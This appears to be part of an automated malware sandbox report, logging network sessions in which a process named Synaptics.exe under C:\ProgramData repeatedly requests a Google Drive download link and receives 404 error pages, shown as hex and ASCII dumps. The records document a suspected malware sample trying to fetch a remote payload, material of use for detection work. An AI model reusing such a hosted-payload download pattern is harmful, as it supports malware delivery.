                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LgGaN57/RriBJE3uHQwqnw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:43 UTC331INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:43 UTC331INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        108192.168.2.349865142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:43 UTC328OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:43 UTC331INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:43 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-sYLQOq6dUyaBcCg5+lRrww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:43 UTC332INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:43 UTC332INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 37 32 63 52 35 4f 49 78 69 55 53 6b 31 48 45 35 7a 76 75 75 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U72cR5OIxiUSk1HE5zvuuQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:43 UTC333INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:43 UTC334INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        109192.168.2.349866142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:43 UTC334OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:43 UTC334INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:43 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9UOqU230jNE/oCaCjtS1Ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:43 UTC335INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:43 UTC335INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 52 53 53 74 67 67 50 47 61 32 59 50 2b 2f 71 47 52 78 6a 44 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9RSStggPGa2YP+/qGRxjDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:43 UTC337INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:43 UTC337INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        11192.168.2.349746142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:30 UTC31OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:30 UTC34INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:30 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0ukD2zf5kuie4qKeRy9/LA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:30 UTC35INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 35 2b 44 4b 45 34 37 37 6d 62 43 34 72 6e 32 51 38 58 74 38 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="55+DKE477mbC4rn2Q8Xt8A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:30 UTC37INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:30 UTC37INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        110192.168.2.349867142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:43 UTC334OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:43 UTC337INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:43 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-sYI57NZW8xZi2bir8F9CRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:43 UTC338INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 2b 58 33 6a 37 58 6e 4a 36 4a 6f 52 39 69 46 4e 67 30 6d 42 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4+X3j7XnJ6JoR9iFNg0mBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:43 UTC340INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:43 UTC340INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        111192.168.2.349868142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:43 UTC337OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:43 UTC340INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:43 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ScikXyCbLBe1Fvvwd54v/Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:43 UTC341INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:43 UTC341INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 6f 77 44 57 65 70 56 63 57 71 39 2b 78 34 59 62 72 65 6f 65 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TowDWepVcWq9+x4Ybreoew">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
